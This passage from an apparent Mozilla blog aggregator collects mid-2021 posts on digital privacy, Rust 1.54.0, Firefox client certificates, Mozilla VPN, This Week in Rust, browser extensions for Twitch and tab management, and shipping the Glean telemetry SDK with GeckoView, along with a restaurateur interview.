
The result has been something of a crash course in cybersecurity for all involved. Workers have had to navigate VPNs in order to access their company networks and learn how to keep their employer’s data safe. Those that didn’t suffered the consequences. In August 2020, MalwareBytes reported that 20% of organizations had had a data breach due to remote working.


With home working here to stay in some form at least, employees must now be kept updated on cybersecurity best practice to ensure their networks stay protected. This should seep into people’s own online habits, prompting them to be more cautious and to adopt better everyday security hygiene.

Then there was the COVID-19 public health response, with contact tracing apps and vaccine passports putting health privacy front of mind. Their introduction raised thorny questions about how to balance managing the spread of the virus with respecting data privacy. In the UK, privacy fears forced the government to scrap the original version of its contact tracing app and switch to a decentralized operating model.

As mass vaccinations roll out, attention has since turned to vaccine passport apps. In New York, the Excelsior Pass controversially uses private blockchain technology leading to criticism that developer IBM and the state government are hiding behind the blockchain gimmick rather than genuinely earning the trust of the public to protect their information. As a result, the Linux Foundation is now working to develop a set of standards that protects our privacy when we use these apps. This is a significant step forward and provides a baseline for digital privacy protections that could be referenced in the development of other apps.

It’s not just the pandemic that has opened more eyes to privacy issues. Over a tumultuous summer, law enforcement agencies across the U.S. flaunted surveillance powers that brought home just how flimsy our privacy protections truly are.

At the peak of the Black Lives Matter protests, authorities were able to identify protestors via facial recognition tech and track them down using phone location data. To combat this, major news outlets like Time and human rights organizations such as Amnesty International published articles on how we can protect our digital privacy while protesting. The encrypted messaging app Signal even developed an anti-facial recognition mask which they distributed to Black Lives Matter protesters for free.

Finally, moves from Apple over the past year have really hammered home the growing demand for protecting our personal data. The introduction of privacy labels to the App Store means we can now get an idea of an app’s privacy practices before we download it. The iOS 14.5 update also made app tracking opt-in only. A whopping 96% of U.S. users chose not to opt-in, showing just how much consumer behaviour is changing. Needless to say Google has followed suit in some regards, announcing its own version of privacy labels to come next year for Android owners.

This last point is important. Big tech companies have the power to force each other’s hands and shape our lives. If they continue seeing that digital privacy can be profitable, then there’s a great chance it’s here to stay.

Looking back to 2018 when the Cambridge Analytica / Facebook scandal broke, digital privacy was on life support, hanging on by a thread. That shocking moment proved to be the tipping point when many people looked up to see a less private and less secure reality, one which they didn’t want. Since then, many tech companies have found themselves firmly in the sights of a Congress looking to take them down a peg or two. States, led by California, began enacting consumer privacy legislation. Meanwhile in Europe, the introduction of GDPR has been an opening salvo for what strong international consumer privacy protections can look like. Countries like India and Kenya have also begun to consider a data protection law, impacting the privacy of over a billion users on the internet.

But what can we do to demand more for our digital privacy? A good place to start is by using alternatives to big tech platforms like Google, Facebook and Amazon. Switching from Google Chrome to a privacy-focused browser like Mozilla Firefox is a good first step, and maybe it’s time you considered deleting Facebook for good. Until these platforms clean up their act, we can take action by avoiding them altogether. We can also ask our local senators and representatives to vote for legislation that will safeguard us online, such as the Fourth Amendment is Not for Sale Act. The Electronic Frontier Foundation runs numerous campaigns online to help us do this, and you can get involved via their Action Center.

It’s the combination of companies protecting their bottom lines, pressure from regulators, and extraordinary societal moments where we are seeing a turning point in favor of consumer privacy, and there is no going back. As consumers of technology, we must never take these privacy gains for granted and continue pressing for more.

Callum Tennent is a guest opinion columnist for Mozilla’s Distilled blog. He is Site Editor of Top10VPN and a consumer technology journalist as well as a former product testing professional at Which? Magazine. You can find more information about him here and follow him on Twitter at @TennentCallum.


Mozilla Addons Blog: New tagging feature for add-ons on AMO

There are multiple ways to find great add-ons on addons.mozilla.org (AMO). You can browse the content featured on the homepage, use the top navigation to drill down into add-on types and categories, or search for specific add-ons or functionality. Now, we’re adding another layer of classification and opportunities for discovery by bringing back a feature called tags.

We introduced tagging long ago, but ended up discontinuing it because the way we implemented it wasn’t as useful as we thought. Part of the problem was that it was too open-ended, and anyone could tag any add-on however they wanted. This led to spamming, over-tagging, and general inconsistencies that made it hard for users to get helpful results.

Now we’re bringing tags back, but in a different form. Instead of free-form tags, we’ll provide a set of predefined tags that developers can pick from. We’re starting with a small set of tags based on what we’ve noticed users looking for, so it’s possible many add-ons don’t match any of them. We will expand the list of tags if this feature performs well.

The tags will be displayed on the listing page of the add-on. We also plan to display tagged add-ons on the AMO homepage.

Example of a tag shelf on the AMO homepage

We’re only just starting to roll this feature out, so we might be making some changes to it as we learn more about how it’s used. For now, add-on developers should visit the Developer Hub and set any relevant tags for their add-ons. Any tags that had been set prior to July 22, 2021 were removed when the feature was retooled.


The Rust Programming Language Blog: Announcing Rust 1.54.0

The Rust team is happy to announce a new version of Rust, 1.54.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.54.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.54.0 on GitHub.

What's in 1.54.0 stable

Attributes can invoke function-like macros

Rust 1.54 supports invoking function-like macros inside attributes. Function-like macros can be either macro_rules! based or procedural macros which are invoked like macro!(...). One notable use case for this is including documentation from other files into Rust doc comments. For example, if your project's README represents a good documentation comment, you can use include_str! to directly incorporate the contents. Previously, various workarounds allowed similar functionality, but from 1.54 this is much more ergonomic.

#![doc = include_str!("README.md")]

Macros can be nested inside the attribute as well. For example, the concat! macro can be used to construct a doc comment from within a macro that uses stringify! to include substitutions:

macro_rules! make_function {
    ($name:ident, $value:expr) => {
        #[doc = concat!("The `", stringify!($name), "` example.")]
        ///
        /// # Example
        ///
        /// ```
        #[doc = concat!(
            "assert_eq!(", module_path!(), "::", stringify!($name), "(), ",
            stringify!($value), ");")
        ]
        /// ```
        pub fn $name() -> i32 {
            $value
        }
    };
}

make_function! {func_name, 123}

Read here for more details.

wasm32 intrinsics stabilized

A number of intrinsics for the wasm32 platform have been stabilized, which gives access to the SIMD instructions in WebAssembly.

Notably, unlike the previously stabilized x86 and x86_64 intrinsics, these do not have a safety requirement to only be called when the appropriate target feature is enabled. This is because WebAssembly was written from the start to validate code safely before executing it, so instructions are guaranteed to be decoded correctly (or not at all).

This means that we can expose some of the intrinsics as entirely safe functions, for example v128_bitselect. However, there are still some intrinsics which are unsafe because they use raw pointers, such as v128_load.
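To give a flavor of the API, here is a rough sketch (not from the release notes; see the std::arch::wasm32 documentation for the exact signatures):

// Only compiles when targeting WebAssembly, e.g.
// `cargo build --target wasm32-unknown-unknown`.
#[cfg(target_arch = "wasm32")]
fn pick_lanes() -> i32 {
    use std::arch::wasm32::*;

    let a = i32x4_splat(1); // [1, 1, 1, 1]
    let b = i32x4_splat(2); // [2, 2, 2, 2]
    // All mask bits set: select every bit from `a` rather than `b`.
    let mask = i32x4_splat(-1);
    let selected = v128_bitselect(a, b, mask);
    i32x4_extract_lane::<0>(selected) // 1, in entirely safe code
}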

Incremental Compilation is re-enabled by default

Incremental compilation has been re-enabled by default in this release, after being disabled by default in 1.52.1.

In Rust 1.52, additional validation was added when loading incremental compilation data from the on-disk cache. This resulted in a number of pre-existing potential soundness issues being uncovered as the validation changed these silent bugs into internal compiler errors (ICEs). In response, the Compiler Team decided to disable incremental compilation in the 1.52.1 patch, allowing users to avoid encountering the ICEs and the underlying unsoundness, at the expense of longer compile times. [1]

Since then, we've conducted a series of retrospectives and contributors have been hard at work resolving the reported issues, with some fixes landing in 1.53 and the majority landing in this release. [2]

There are currently still two known issues which can result in an ICE. Due to the lack of automated crash reporting, we can't be certain of the full extent of impact of the outstanding issues. However, based on the feedback we received from users affected by the 1.52 release, we believe the remaining issues to be rare in practice.

Therefore, incremental compilation has been re-enabled in this release!

Stabilized APIs

The following methods and trait implementations were stabilized.

Other changes

There are other changes in the Rust 1.54.0 release: check out what changed in Rust, Cargo, and Clippy.

rustfmt has also been fixed in the 1.54.0 release to properly format nested out-of-line modules. This may cause changes in formatting to files that were being ignored by the 1.53.0 rustfmt. See details here.

Contributors to 1.54.0

Many people came together to create Rust 1.54.0. We couldn't have done it without all of you. Thanks!

  1. The 1.52.1 release notes contain a more detailed description of these events.

  2. The tracking issue for the issues is #84970.

Mozilla Security Blog: Making Client Certificates Available By Default in Firefox 90

Starting with version 90, Firefox will automatically find and offer to use client authentication certificates provided by the operating system on macOS and Windows. This security and usability improvement has been available in Firefox since version 75, but previously end users had to manually enable it.
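(For the curious: the switch in question is, if memory serves, the about:config preference security.osclientcerts.autoload; Firefox 90 simply changes its default to true.)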

When a web browser negotiates a secure connection with a website, the web server sends a certificate to the browser to prove its identity. Some websites (most commonly corporate authentication systems) request that the browser send a certificate back as well, so that the website visitor can prove their identity to the website (similar to logging in with a username and password). This is sometimes called “mutual authentication”.

Starting with Firefox version 90, when you connect to a website that requests a client authentication certificate, Firefox will automatically query the operating system for such certificates and give you the option to use one of them. This feature will be particularly beneficial when relying on a client certificate stored on a hardware token, since you do not have to import the certificate into Firefox or load a third-party module to communicate with the token on behalf of Firefox. No manual task or preconfiguration will be necessary when communicating with your corporate authentication system.

If you are a Firefox user, you don’t have to do anything to benefit from this usability and security improvement to load client certificates. As soon as your Firefox auto-updates to version 90, you can simply select your client certificate when prompted by a website. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the web.


The Mozilla Blog: Lalo Luevano, restaurateur and co-founder of Bodega wine bar

On the internet you are never alone, and because of that at Mozilla we know that we can’t work to build a better internet alone. We believe in and rely on our community — from our volunteers, to our staff, to our users, fans and friends. Meet Lalo Luevano, partner and co-founder of Bodega, a natural wine bar in the North Beach neighborhood of San Francisco.

Tell me a little about yourself. 

I was born and raised in Santa Cruz, California. It’s a little surf town, very tight knit, very laid back. I think it rubbed off on me a lot because I’m a laid back sort of person. I’m from a Mexican background. My parents always loved having big barbecues and having lots of friends over. They were involved with fundraisers for my baseball team or my sister’s soccer teams. I always wanted to be part of the production side, getting involved in what we were serving and in the cooking. My dad also loves to cook. He’d be on the grill and I was very much into manning the grill any chance I got. Cooking has been a big part of my family upbringing.

What do you love about cooking?

It’s like my therapy, essentially. I definitely get into a meditative state when cooking. I can just kind of zero in and focus on something and that’s really important to me when I’m doing it. 

How long have you been involved in the restaurant scene?

Right out of college, I went into engineering, working for a defense contractor for about six to eight years. I was living in Santa Clara and I found myself coming to San Francisco quite a bit to indulge in the live music scene, the food and the bars, but never really considered it as a profession or a lifestyle. It just seemed very daunting. Everybody hears the horror stories of restaurants and the failure rate.

By becoming friends with restaurateurs and owners of different places, I started getting the idea that maybe this is something I can do. I met somebody who was a trained chef who invited me to get involved in a pop-up so I could understand how a restaurant works behind the scenes. It was so successful the first time that we ended up doing it seasonally. 

We walked away with a good chunk of change that we weren’t really looking for. The pop-up was just a way to do something fun and have a bunch of friends and feed strangers, and such, but we would still walk away with a good amount of cash, at which point, I think that’s what really gave me the confidence of like saying hey, we can actually open up a spot.

And that led you to Bodega?

Yeah, this space in North Beach in San Francisco just happened to fall on our laps. I caught wind from a friend that this woman was considering selling her business, so I went and checked it out with my business partner, and it was just an amazing location right next to Washington Square Park. We’ve been doing this now for six years, and I’m proud to say, I think we were probably one of the first natural wine bars in the city. We have a really nice curated list of wines and a menu that rotates frequently but it’s really fresh and it’s inventive. It’s a really fun and energetic atmosphere.

What do you enjoy most about being a restaurateur? 

The creativity of it. Like creating the concept itself. I really enjoy how the menu coincides with the wine list and the music. I just love the entire production of it. I feel like I picked the right profession because it’s where I get to have a good time and explore the fun side of my personality. I really enjoy being a curator.

Who inspires you? 

Throughout the pandemic, I was very inspired by — like I’m sure a lot of people were — what David Chang was doing. Here’s a guy who owns some of the best restaurants in the U.S. And he’s posting videos during complete lockdowns on how to keep your scallions going after you’ve used them down to the end. He was doing stuff in the microwave. Or showing how to reuse stuff. I was like this guy’s amazing!

I’m always looking for inspiration. It’s honestly a constant thing. I guess this goes back to my indie sort of roots. I’m a mixtape sort of person. I’m always trying to look a little bit further and deeper. For me it’s not usually on the surface. I really have to dig in to find a pop-up or a chef or something that somebody’s talking about that I have to go through multiple channels in order to find out more. But I enjoy that.

What’s your favorite fun stuff to do online?

I’m a business tech nerd. I’m very much in tune with what’s going on in the valley. That’s still very ingrained in me just being here. I want to know what’s happening and who the movers and shakers are at the moment, or what’s the latest unicorn. That’s always been very fascinating to me.

The restaurant and service industries were hit especially hard during the pandemic, and we’re still in bumpy times. How did things go for you? 

We didn’t know what to expect early on, obviously I don’t think anybody did. At that point we thought it was just going to be a two month thing, and we were prepared for that. We started to realize that a lot of restaurants and places were allowed to do window service. But there was no joy in it. Honestly it was hard to find joy during those times. 

The way we looked at it was that there are so many restaurants and so many concepts that we’ve been inspired by through the years, even places overseas, that just do a window and still bring a lot of joy. That inspired us to just open up the windows, play some music, have a good time with it. We started experimenting with some of the dishes we were doing. We were doing everything from TV dinner nights with Salisbury steak and potatoes, Jamaican jerk night with chicken, burger night and taco Tuesdays, just being really creative and fun with the dishes.

We’d have the music going and keep safety in mind with the six-foot tape and masks. We could still be playing punk rock or hip hop and, you know, say hi to people and just have a great time with it. We would post everything the day before to keep everyone aligned. I don’t know if it would have been possible without the social media aspect.

The internet has touched restaurants in so many ways, like social media, third party delivery services, review sites and even maintaining a website. How have any of these touched restaurant life for you?

I’ve always had mixed feelings about that. I like that Bodega is the little sexy wine bar on the corner that only so many people know about but we’re always super busy. I’ve always thought that it adds to the mysteriousness of it. I’d rather have people just come in the doors and experience it themselves. Maybe that’s part of the magic that we create.

If budget, time and location were not issues, where would you go for a meal and why?

St. John in London. I’ve never been, but I’ve followed them closely. It just looks like a place I want to go and spend hours just drinking wine and having a good conversation. It looks like they care very much about the details, and I can expect to have a really, really nice dish.

This interview has been edited for length and clarity.

The post Lalo Luevano, restaurateur and co-founder of Bodega wine bar appeared first on The Mozilla Blog.

The Mozilla BlogCelebrating Mozilla VPN: How we’re keeping your data safe for you

A year goes by so quickly, and we have good reason to celebrate. Since our launch last year, Mozilla VPN, our fast and easy-to-use Virtual Private Network service, has expanded to seven more countries: Austria, Belgium, France, Germany, Italy, Spain and Switzerland, bringing the total to 13 countries where Mozilla VPN is available. We also expanded our VPN service offerings, and it’s now available on Windows, Mac, Linux, Android and iOS platforms. We have also given you more payment choices: credit card, PayPal or Apple in-app purchases. Lastly, our list of supported languages continues to grow; to date we support 28 languages. Thousands of people have signed up to subscribe to Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the web.

Mozilla VPN is developed by Mozilla, a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet. We are committed to innovating and bringing new features to Mozilla VPN based on feedback from our community. This year, the team has been working on additional security and customization features, which will soon be available to our users.

Today, we’re launching a new feature that’s been requested by many users: split tunneling. It allows you to divide your internet traffic and choose which apps you want to secure through an encrypted VPN tunnel, and which apps you want to connect over the open network. Additionally, we recently released the captive portal feature, which allows you to join public Wi-Fi networks securely. We continue to add new features to offer you the flexibility to use Mozilla VPN wherever you go.

Divide and conquer your apps with our split tunneling feature

Today, we’re launching the split tunneling feature so you can choose which apps use Mozilla VPN and which ones connect over the open network. This lets you prioritize which connections you want to keep protected by Mozilla VPN. This feature is available on Windows, Linux and Android.

Joining public Wi-Fi networks securely through our captive portal

Recently, we added the option to join public Wi-Fi networks securely, a feature that makes sure you can easily use our trustworthy Mozilla VPN service to protect your device and data when you are on a public Wi-Fi network. If your VPN is on when you first connect to a cafe’s public Wi-Fi network, you may be blocked from seeing the network’s landing or login page, known as the captive portal. Mozilla VPN will recognize this and show a notification to turn off Mozilla VPN so you can sign in through that landing or login page. Then, once you’re logged in, you’ll receive a notification prompting you to reconnect to Mozilla VPN. This feature is available on Windows, Linux and Android.

New and flexible pricing plans

Recently, we changed our prices after hearing from consumers who wanted more flexibility and different plan options at different price points. As a token of our appreciation to the users who signed up when we first launched last year, we will continue to honor the $4.99 monthly subscription for users in the original six countries – the United States, Canada, the United Kingdom, Singapore, Malaysia, and New Zealand. New customers in those six countries who subscribe after July 14, 2021 can get the same low price by signing up for a 12-month subscription.

We know that it’s more important than ever for you to be safe, and for you to know that what you do online is your own business. By subscribing to Mozilla VPN, users support both Mozilla’s product development and our mission to build a better web for all.  Check out the Mozilla VPN and subscribe today from our website.

The post Celebrating Mozilla VPN: How we’re keeping your data safe for you appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 401

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

What does This Week in Rust mean to you?

This Week in Rust will be the focus of nellshamrell's RustConf keynote in September. She would love it if you helped inform the talk by sharing what This Week in Rust means to you on this Reddit post or in the Discourse forums. Thank you!

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research
Miscellaneous

Crate of the Week

This week's crate is loadstone, a bare-metal bootloader for embedded systems.

Thanks to Andres O. Vela for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

287 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with only improvements. There was one possible regression, but it was removed from consideration due to only barely impacting a somewhat noisy stress-test benchmark. Untriaged pull requests continue to pile up, but there is still not a good process for dealing with them.

Triage done by @rylev. Revision range: 5c0ca08..998cfe5

0 Regressions, 3 Improvements, 0 Mixed; 0 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

The Tor Project

Stockly

Rhebo GmbH

ChainSafe

Kraken

Lumeo

Tweede golf

Kollider

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

We were able to verify the safety of Rust's type system and thus show how Rust automatically and reliably prevents entire classes of programming errors

Ralf Jung on Eureka Alert Science News

Thanks to Henrik Tougaard for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Firefox Add-on ReviewsTweak Twitch—BetterTTV and other extensions for Twitch customization

Customize chat, optimize your video player, auto-collect channel points, and much much more. Explore some of the ways you can radically transform your Twitch experience with a browser extension… 

BetterTTV

One of the most feature rich and popular Twitch extensions out there, BetterTTV has everything from fun new emoticons to advanced content filtering. 

Key features:

  • Auto-collect channel points
  • Easier-to-read chat interface
  • Select usernames, words, or specific phrases you want highlighted throughout Twitch; or blacklist any of those elements you want filtered out
  • New emoticons to use globally or custom per channel
  • See deleted messages
  • Anonymous Chat—join a channel without notice

Alternate Player for Twitch.tv

While this extension’s focus is on video player customization, Alternate Player for Twitch.tv packs a bunch of other great features unrelated to video streaming. 

Let’s start with the video player. Some of its best tweaks include:

  • Ad blocking! Wipe away all of those suuuuper looooong pre-rolls
  • Choose a new color for the player 
  • Instant Replay is a wow feature—go back and watch up to a minute of material that just streamed (includes ability to speed up/slow down replay) 

Alternate Player for Twitch.tv also appears to run live streams at even smoother rates than Twitch’s default player. You can further optimize your stream by adjusting the extension’s bandwidth settings to better suit your internet speed. Audio Only mode is really great for saving bandwidth if you’re just tuning in for music or discussion. 

Our favorite feature is the ability to customize the size and location of the chat interface while in full-screen mode. Make the chat small and tuck it away in a corner or expand it to consume most of the screen; or remove chat altogether if the side conversation is a mood killer.

Twitch Previews

This is the best way to channel surf. Just hover over a stream icon in the sidebar and Twitch Previews will display its live video in a tiny player. 

No more clicking away from the thing you’re watching just to check out other streams. Additional features we love include the ability to customize the video size and volume of the previews, a sidebar auto-extender (to more easily see all live streamers), and full-screen mode with chat. 

<figcaption>Mouse over a stream in the sidebar to get a live look with Twitch Previews.</figcaption>

Unwanted Twitch

Do you keep seeing the same channels over and over again that you’re not interested in? Unwanted Twitch wipes them from your experience. 

Not only can you block specific channels you don’t want, you can even hide entire categories (I’m done with dubstep!) or specific tags (my #Minecraft days are behind me). Other niche “hide” features include the ability to block reruns and streams with certain words appearing in their title. 

Twitch Chat Pronouns

What a neat idea. Twitch Chat Pronouns lets you add gender pronouns to usernames. 

The pronouns will display next to Twitch usernames. You’ll need to enter a pronoun for yourself if you want one to appear to other extension users. 

We hope your Twitch experience has been improved with a browser extension! Find more media enhancing extensions on addons.mozilla.org.

Data@MozillaThis Week in Glean: Shipping Glean with GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog).


Glean SDK

The Glean SDK is Mozilla’s telemetry library, used in most mobile products and now for Firefox Desktop as well. By now it has grown to a sizable code base with a lot of functionality beyond just storing some metric data. Since its first release as a Rust crate in 2019 we managed to move more and more logic from the language SDKs (previously also known as “language bindings”) into the core Rust crate. This allows us to maintain business logic only once and easily share it across different implementations and platforms. The Rust core is shipped precompiled for multiple target platforms, with each language SDK distributed through the respective package manager.

I talked about how this all works in more detail last year, this year and blogged about it in a previous TWiG.

GeckoView

GeckoView is Mozilla’s alternative implementation for WebViews on Android, based on Gecko, the web engine that also powers Firefox Desktop. It is used as the engine behind Firefox for Android (also called Fenix). The visible parts of what makes up Firefox for Android are written in Kotlin, but it all delegates to the underlying Gecko engine, written in a combination of C++, Rust & JavaScript.

The GeckoView code resides in the mozilla-central repository, next to all the other Gecko code. From there releases are pushed to Mozilla’s own Maven repository.

One Glean too many

Initially Firefox for Android was the only user of the Glean SDK. Up until today it consumes Glean through its release as part of Android Components, a collection of libraries to build browser-like applications.

But the Glean SDK is also available outside of Android Components, as its own package. And additionally it’s available for other languages and platforms too, including a Rust crate. Over the past year we’ve been busy getting Gecko to use Glean through the Rust crate to build its own telemetry on top.

With the Glean SDK used in all these applications we’re in a difficult position: There’s a Glean in Firefox for Android that’s reporting data. Firefox for Android is using Gecko to render the web. And Gecko is starting to use Glean to report data.

That’s one Glean too many if we want coherent data from the full application.

Shipping it all together, take one

Of course we knew about this scenario for a long time. It’s been one of the goals of Project FOG to transparently collect data from Gecko and the embedding application!

We set out to find a solution so that we can connect both sides and have only one Glean be responsible for the data collection & sending.

We started with more detailed planning all the way back in August of last year and agreed on a design in October. Due to changed priorities & availability of people we didn’t get into the implementation phase until earlier this year.

By February I had a first rough prototype in place. When Gecko was shipped as part of GeckoView it would automatically look up the Glean library that is shipped as a dynamic library with the Android application. All function calls to record data from within Gecko would thus ultimately land in the Glean instance that is controlled by Fenix. Glean and the abstraction layer within Gecko would do the heavy work, but users of the Glean API would notice no difference, except their data would now show up in pings sent from Fenix.

This integration was brittle. It required finding the right dynamic library, looking up symbols at runtime as well as reimplementing all metric types to switch to the FFI API in a GeckoView build. We abandoned this approach and started looking for a better one.

Shipping it all together, take two

After the first failed approach the issue was acknowledged by other teams, including the GeckoView and Android teams.

Glean is not the only Rust project shipped for mobile, the application-services team is also shipping components written in Rust. They bundle all components into a single library, dubbed the megazord. This reduces its size (dependencies & the Rust standard library are only linked once) and simplifies shipping, because there’s only one library to ship. We always talked about pulling in Glean as well into such a megazord, but ultimately didn’t do it (except for iOS builds).
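To make the megazord idea a bit more concrete, here is a rough sketch of what such a bundling crate’s Cargo.toml can look like (the crate and component names are made up; the real build files differ):

```toml
# Hypothetical "megazord" bundling crate: one cdylib that links
# every Rust component, and the Rust standard library, exactly once.
[package]
name = "example-megazord"   # made-up name
version = "0.1.0"

[lib]
crate-type = ["cdylib"]     # produce a single shared library to ship

[dependencies]
component-a = "0.1"         # hypothetical Rust components that would
component-b = "0.1"         # otherwise each ship their own library
```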

With that in mind we decided it’s now time to design a solution, so that eventually we can bundle multiple Rust components in a single build. We came up with the following plan:

  • The Glean Kotlin SDK will be split into 2 packages: a glean-native package, that only exists to ship the compiled Rust library, and a glean package, that contains the Kotlin code and has a dependency on glean-native.
  • The GeckoView-provided libxul library (that’s “Gecko”) will bundle the Glean Rust library and export the C-compatible FFI symbols, that are used by the Glean Kotlin SDK to call into Glean core.
  • The GeckoView Kotlin package will then use Gradle capabilities to replace the glean-native package with itself (this is actually handled by the Glean Gradle plugin).

Consumers such as Fenix will depend on both GeckoView and Glean. At build time the Glean Gradle plugin will detect this and will ensure the glean-native package, and thus the Glean library, is not part of the build. Instead it assumes libxul from GeckoView will take that role.

This has some advantages. First off everything is compiled together into one big library. Rust code gets linked together and even Rust consumers within Gecko can directly use the Glean Rust API. Next up we can ensure that the version of the Glean core library matches the Glean Kotlin package used by the final application. It is important that the code matches, otherwise calling native functions could lead to memory or safety issues.
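As a rough illustration of what exporting those C-compatible FFI symbols means (the function name and signature below are invented, not Glean’s real interface), a Rust library exposes a stable symbol like this:

```rust
// Illustrative sketch only; not Glean's actual FFI surface.
// `extern "C"` gives the function a C ABI, and `#[no_mangle]` keeps the
// symbol name stable so the Kotlin SDK can look it up in libxul at runtime.
#[no_mangle]
pub extern "C" fn glean_example_counter_add(_metric_id: u64, _amount: i32) {
    // Would dispatch into the single shared glean-core instance.
    // Rust callers inside Gecko skip this C ABI entirely and call the
    // Glean Rust API directly, since everything is linked together.
}
```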

Glean is running ahead here, paving the way for more components to be shipped the same way. Eventually the experimentation SDK called Nimbus and other application-services components will start using the Rust API of Glean. This will require compiling Glean alongside them, and that’s exactly the case that the mozilla-central build for GeckoView handles.

Now the unfortunate truth is: these changes have not landed yet. It’s been implemented for both the Glean SDK and mozilla-central, but also requires changes for the build system of mozilla-central. Initially that looked like simple changes to adopt the new bundling, but it turned into bigger changes across the board. Some of the infrastructure used to build and test Android code from mozilla-central was untouched for years and thus is very outdated and not easy to change. With everything else going on for Firefox it’s been a slow process to update the infrastructure, prepare the remaining changes and finally getting this landed.

But we’re close now!

Big thanks to Agi for connecting the right people, driving the initial design and helping me with the GeckoView changes. He also took on the challenge of changing the build system. And also thanks to chutten for his reviews and input. He’s driving the FOG work forward and thus really really needs us to ship GeckoView support.

The Mozilla BlogSpace Cowboy, Guardians of Cleveland, and Tony Award winner Ellen Barkin considers a Substack – here is this week’s Top Shelf.

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we share the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution.

Here’s what made it to the Top Shelf for the week of July 19, 2021, in no particular order.


The post Space Cowboy, Guardians of Cleveland, and Tony Award winner Ellen Barkin considers a Substack – here is this week’s Top Shelf. appeared first on The Mozilla Blog.

Firefox Add-on ReviewsToo many open tabs? Extensions to the rescue!

The first step in getting help with your tab hoarding problem is to admit you have a tab hoarding problem. Whatever the reason may be—your job requires you to have dozens of open tabs or the rows of tabs represent your neverending “read later” list—you can regain control of this spiraling situation with the right browser extension. 

Tree Style Tab

Organize your tabs into a clean, cascading “tree” format. Tree Style Tab opens new tabs as “branches” of the parent tab, so all of your open tabs are automatically organized in an easy-to-glance tree branch layout. 

If you’re someone who likes to visually organize information, Tree Style Tab can be a real game changer. It’s very simple to use—just drag n drop different branches to reorganize your clusters of open tabs. 

<figcaption>Tree Style Tab keeps your tabs tucked away in a tidy sidebar. </figcaption>

OneTab

For the times you suddenly find yourself overwhelmed with a bazillion open tabs, OneTab is your page overload panic button. 

Just hit OneTab’s toolbar button and all open tabs get tucked away into a single scrollable page. Save major CPU and memory with all pages now dormant. Reactivate them one by one or all at once. 

<figcaption>With the click of a mouse OneTab turns all your open tabs into a single list on a page.</figcaption>

Tab Stash

Click the Tab Stash toolbar button and bam!—all those open tabs get stored as bookmarks, which presents intriguing possibilities. 

With tabs temporarily saved as bookmarks listed in a foldaway sidebar menu, you’re free to treat them as either easily navigable links to your previously open tabs, or save them permanently as individual or grouped bookmarks. Firefox Sync users will automatically have their Tab Stash bookmarks synced to other devices. 

<figcaption>Tab Stash elegantly organizes tab overload. </figcaption>

Simple Tab Groups

Great for dealing with lots (and lots) of tab groupings, Simple Tab Groups gives you an easy way to navigate a bunch of tab clusters. 

Click the extension’s toolbar button to pull up a menu that lets you easily navigate your groups of open tabs, or specific pages. If you deal with a mass volume of open tabs—like say hundreds of tabs organized across a couple dozen groups—Simple Tab Groups is the extension for you. 

<figcaption>Simple Tab Groups is great for dealing with a huge volume of tabs. </figcaption>

Tab Session Manager

Save and restore the full state of batches of open tabs with Tab Session Manager.

If you find yourself opening a lot of new windows and filling them up with open tabs, Tab Session Manager lets you easily save the state of the entire window and its tabs so you’re free to close it down altogether until future recall. The extension also supports auto-save features, cloud sync, session import/export, and more. 

Tab Reloader

Do you have a need for frequent page refreshes across numerous tabs? Maybe you’re in a shopping queue waiting for limited availability items? Perhaps you want a news feed refreshed consistently? Whatever your reason, Tab Reloader gives you the ability to set your own custom time intervals for page refreshes. 

The extension gives you great individual page control. Additional features include:

  • Set different reload time intervals per page, or per a group of tabs within the same window
  • Set reloading to occur whether pages are active or not
  • Create custom reload rules for tabs within designated hostnames
  • Manage everything conveniently from a toolbar menu
  • Choose to automatically start your view at the bottom of a freshly reloaded page, should new content appear there

Auto Tab Discard

Laser-focused on a singularly important task, Auto Tab Discard simply suspends all activity for any background tabs, saving you CPU and memory load. 

A streamlined toolbar menu allows for a few other handy actions as well, like discarding specific tabs you don’t need anymore, whitelisting domains so you never accidentally discard them, retrieving accidentally discarded tabs, and more. 

Best of luck retaking control of all those tabs! Explore more tab extensions on addons.mozilla.org.

Mozilla Performance BlogPerformance Sheriff Newsletter (June 2021)

In June there were 119 alerts generated, resulting in 22 regression bugs being filed on average 3.7 days after the regressing change landed.

